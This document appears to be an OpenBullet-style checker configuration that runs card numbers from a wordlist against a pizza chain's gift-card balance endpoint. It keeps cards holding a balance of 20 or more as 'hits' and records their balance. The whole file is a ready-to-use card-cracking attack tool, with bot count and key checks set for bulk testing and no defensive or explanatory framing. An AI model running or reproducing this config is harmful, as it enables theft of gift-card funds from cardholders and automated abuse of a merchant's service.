[SETTINGS]
{
  "Name": "BlazePizza",
  "SuggestedBots": 40,
  "LastModified": "2018-07-15T02:46:55.9076556+00:00",
  "AdditionalInfo": "",
  "Author": "hze",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "Cards",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST GET "https://blazepizza.alohaenterprise.com:4430/servlet/MemberLinkSVServlet?companyID=bla09&requestType=checkSVCardForEPin&cardNumber=<USER>" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "cardBalance" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "cardBalance" 
    KEY "currentCardBalance\":0,\"" 
    KEY "svHistory\":[]" 
PARSE "<SOURCE>" LR "currentCardBalance\":" ",\"" Recursive=FALSE -> VAR "BALANCE" "$" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "<BALANCE>" LessThan "20" 
PARSE "<SOURCE>" LR "{\"cardBalance\":" ",\"" Recursive=FALSE -> CAP "HOLDS" "$" "" 
